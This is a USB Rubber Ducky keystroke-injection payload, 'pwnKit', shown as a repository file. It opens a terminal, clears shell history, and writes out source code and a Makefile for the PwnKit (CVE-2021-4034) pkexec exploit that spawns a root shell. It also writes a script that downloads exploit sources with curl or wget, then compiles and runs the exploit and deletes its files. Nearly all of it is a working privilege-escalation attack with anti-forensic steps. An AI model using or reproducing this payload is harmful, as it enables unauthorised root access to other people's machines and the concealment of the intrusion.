CoCalc -- payload.txt

GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/execution/DawnKit/payload.txt
³⁰¹⁸ views
1
REM Title: pwnKit
2
REM Description: Privilege escalation in Unix-like operating systems
3
REM Author: drapl0n
4
REM Version: 1.0
5
REM Category: Privilege Escalation
6
REM Target: Unix-like operating systems
7
REM Attackmodes: HID
8

9
DELAY 1000
10
CTRL-ALT t
11
DELAY 1000
12
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
13
ENTER
14
DELAY 400
15
STRING mkdir /tmp/pwn && cd /tmp/pwn
16
ENTER
17
DELAY 400
18
STRING echo -e '"CFLAGS=-Wall\nTRUE=$(shell which true)\n\n.PHONY: all\nall: pwnkit.so cve-2021-4034 gconv-modules gconvpath\n\n.PHONY: clean\nclean:\n\trm -rf pwnkit.so cve-2021-4034 gconv-modules GCONV_PATH=./\n\tmake -C dry-run clean\n\ngconv-modules:\n\techo "module UTF-8// PWNKIT// pwnkit 1" > $@\n\n.PHONY: gconvpath\ngconvpath:\n\tmkdir -p GCONV_PATH=.\n\tcp -f $(TRUE) GCONV_PATH=./pwnkit.so:.\n\npwnkit.so: pwnkit.c\n\t$(CC) $(CFLAGS) --shared -fPIC -o $@ $<\n\n.PHONY: dry-run\ndry-run:\n\tmake -C dry-run"' > Makefile
19
ENTER
20
DELAY 400
21
STRING echo -e "#include <unistd.h>\n\nint main(int argc, char **argv)\n{\n\tchar * const args[] = {\n\t\tNULL\n\t};\n\tchar * const environ[] = {\n\t\t"\"pwnkit.so:.\"",\n\t\t"\"PATH=GCONV_PATH=.\"",\n\t\t"\"SHELL=/lol/i/do/not/exists\"",\n\t\t"\"CHARSET=PWNKIT\"",\n\t\t"\"GIO_USE_VFS=\"",\n\t\tNULL\n\t};\n\treturn execve("\"/usr/bin/pkexec\"", args, environ);\n}" > cve-2021-4034.c
22
ENTER
23
DELAY 400
24
STRING echo -e ""'#!/usr/bin/env sh\n\nURL='https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/'\n\nfor EXPLOIT in "${URL}/cve-2021-4034.c" "${URL}/pwnkit.c" "${URL}/Makefile"\ndo\n\tcurl -sLO "$EXPLOIT" || wget --no-hsts -q "$EXPLOIT" -O "${EXPLOIT##*/}"\ndone\n\nmake\n\n./cve-2021-4034'"" > cve-2021-4034.sh
25
ENTER
26
DELAY 400
27
STRING echo -e "#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nvoid gconv(void) {\n}\n\nvoid gconv_init(void *step)\n{\n\tchar * const args[] = { "\"/bin/sh\"", NULL };\n\tchar * const environ[] = { "\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin\"", NULL };\n\tsetuid(0);\n\tsetgid(0);\n\texecve(args[0], args, environ);\n\texit(0);\n}" > pwnkit.c
28
ENTER
29
DELAY 200
30
STRING make && ./cve-2021-4034
31
ENTER
32
DELAY 4000
33
STRING rm -rf /tmp/pwn
34
ENTER
35

36
Product

Resources

Company
